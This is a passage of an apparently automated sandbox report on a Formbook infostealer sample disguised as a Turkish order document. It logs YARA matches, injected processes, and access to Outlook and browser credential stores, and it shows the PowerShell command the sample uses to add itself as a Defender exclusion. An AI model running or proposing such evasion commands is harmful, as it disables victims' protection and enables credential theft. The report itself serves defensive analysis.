            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1685588395.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1684163629.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000019ED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.000000000147C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeBinary or memory string: OriginalFilenamerZwD.exe> vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, fOm1m09TqPZZgHoxih.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, fOm1m09TqPZZgHoxih.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, fOm1m09TqPZZgHoxih.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@15/11
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.logJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csme5hsf.fwq.ps1Jump to behavior
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: fc.exe, 00000009.00000003.2333399576.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2334194872.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4151524691.00000000006C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeReversingLabs: Detection: 34%
            Source: unknownProcess created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
            Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"Jump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"Jump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: fc.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152100316.0000000000A78000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fc.pdbGCTL source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152100316.0000000000A78000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rZwD.pdbSHA256 source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: Binary string: rZwD.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
